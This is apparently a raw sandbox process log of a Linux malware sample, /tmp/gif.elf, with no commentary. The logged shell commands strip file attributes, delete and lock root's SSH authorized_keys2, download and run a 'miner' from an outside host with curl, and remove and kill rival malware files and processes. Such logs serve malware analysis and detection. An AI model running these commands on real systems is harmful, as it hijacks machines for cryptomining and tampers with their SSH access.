      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /root/.ssh"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /root/.ssh
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "rm -rf /root/.ssh/authorized_keys2"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/rm
      Arguments:rm -rf /root/.ssh/authorized_keys2
      File size:72056 bytes
      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr +i /root/.ssh/authorized_keys2"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr +i /root/.ssh/authorized_keys2
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/curl
      Arguments:curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner
      File size:239848 bytes
      MD5 hash:add6bc2195e82c55985ccf49fd4048e6

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /tmp/python > /dev/null 2>&1 && rm -rf /tmp/python > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /tmp/python
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia chattr -ia /usr/bin/bsd-port/getty > /dev/null 2>&1 && rm -rf /usr/bin/bsd-port/getty > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:51
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia chattr -ia /usr/bin/bsd-port/getty
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /usr/bin/.sshd > /dev/null 2>&1 && rm -rf /usr/bin/.sshd > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /usr/bin/.sshd
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /etc/rc.d/init.d/selinux > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/selinux > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /etc/rc.d/init.d/selinux
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /etc/rc.d/init.d/DbSecuritySp > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/DbSecuritySpt > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /etc/rc.d/init.d/DbSecuritySp
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /usr/bin/sh.sh > /dev/null 2>&1 && rm -rf /usr/bin/sh.sh > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /usr/bin/sh.sh
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /etc/cron.hourly/cron.sh > /dev/null 2>&1 && rm -rf /etc/cron.hourly/cron.sh > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /etc/cron.hourly/cron.sh
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /lib/udev/udev /lib/udev/debug > /dev/null 2>&1 && rm -rf /lib/udev/udev /lib/udev/debug > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /lib/udev/udev /lib/udev/debug
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /usr/bin/xrig > /dev/null 2>&1 && rm -rf /usr/bin/xrig 1> /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /usr/bin/xrig
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "killall .sshd xrig getty > /dev/null 2>&1 "
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:29:52
      Start date (UTC):09/03/2025
      Path:/usr/bin/killall
      Arguments:killall .sshd xrig getty
      File size:32024 bytes
      MD5 hash:cd2adedbee501869ac691b88af39cd8b